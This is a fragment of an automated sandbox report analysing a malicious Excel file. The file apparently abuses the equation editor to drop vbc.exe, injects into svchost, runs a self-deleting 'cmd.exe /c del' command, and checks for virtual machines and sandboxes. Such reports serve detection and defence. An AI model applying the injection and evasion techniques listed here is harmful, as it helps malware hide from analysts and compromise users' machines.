          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00AACBA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009FFBD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A8DBDA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A27B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A9FDDD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A30D3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A0CD5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A32E2F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A1EE4C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A9CFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A10F3F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A2DF7C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009C184
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009B4A3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009B982
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009CBAB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00088C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00082D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00082D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00082FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_008467C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00845062
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_008432FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00843302
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00841362
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_008475B2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_008408F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00840902
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00A6F970 appears 81 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00A43F92 appears 132 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00A4373B appears 238 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 009FE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 009FDF5C appears 118 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0099F970 appears 81 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00973F92 appears 108 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0097373B appears 238 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0092E2A8 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0092DF5C appears 118 times
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004181C0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00418270 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004182F0 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041826D NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041839A NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009200C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00920048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00920078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009207AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009210D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00920060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009201D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0092010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00921148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00921930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00920C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00921D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009F00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009F07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EFAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EFB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009F10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009F0048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009F0078 NtResumeThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009F0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009F01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009F010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009F1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EF8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EF938 NtWriteFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009F1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EFA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EFA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EFBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EFC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EFC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EFC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009F0C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009F1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EFD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EFEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EFE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EFFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009EFF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_000981C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00098270 NtReadFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_000982F0 NtClose,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_000983A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009826D NtReadFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009839A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0084632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_008467C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00846332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_008467C2 NtQueryInformationProcess,
          Source: vbc[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vbc[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vbc[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 76E90000 page execute and read and write
          Source: vbc[1].exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: COAU7229898130.xlsxVirustotal: Detection: 35%
          Source: COAU7229898130.xlsxReversingLabs: Detection: 34%
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$COAU7229898130.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE954.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/27@6/5
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: explorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: vbc[1].exe.4.dr, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: vbc.exe.4.dr, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 6.2.vbc.exe.f70000.2.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 6.0.vbc.exe.f70000.0.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 7.0.vbc.exe.f70000.0.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 7.2.vbc.exe.f70000.5.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, svchost.exe
          Source: Binary string: svchost.pdb source: vbc.exe, 00000007.00000002.514322943.0000000000549000.00000004.00000020.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: vbc[1].exe.4.dr, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: vbc.exe.4.dr, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.2.vbc.exe.f70000.2.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.vbc.exe.f70000.0.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.0.vbc.exe.f70000.0.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.2.vbc.exe.f70000.5.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00F7297F push 20000001h; retf
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A024 push es; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00418846 push edi; retf
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041C935 push ds; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041C99B push dword ptr [87B7EB05h]; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00415298 push ebp; retf
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0040C300 push ds; iretd
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041CB3F pushad ; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B3B5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B46C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B402 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B40B push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041C538 push dword ptr [2E33947Ah]; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00414D98 push ebx; retf
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004066FC push ecx; iretd
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041C793 push dword ptr [2E33947Ah]; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00F7297F push 20000001h; retf
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0092DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009FDFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00095298 push ebp; retf
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0008C300 push ds; iretd
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009B40B push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009B402 push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009B46C push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009C538 push dword ptr [2E33947Ah]; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_000866FC push ecx; iretd
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009C793 push dword ptr [2E33947Ah]; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00098846 push edi; retf
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009C935 push ds; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009C99B push dword ptr [87B7EB05h]; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.5240697297
          Source: initial sampleStatic PE information: section name: .text entropy: 7.5240697297
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 940, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 000000000008897E second address: 0000000000088984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2432Thread sleep time: -240000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2248Thread sleep time: -33461s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2732Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\svchost.exe TID: 2680Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004088B0 rdtsc
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 33461
          Source: explorer.exe, 00000008.00000000.544799470.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
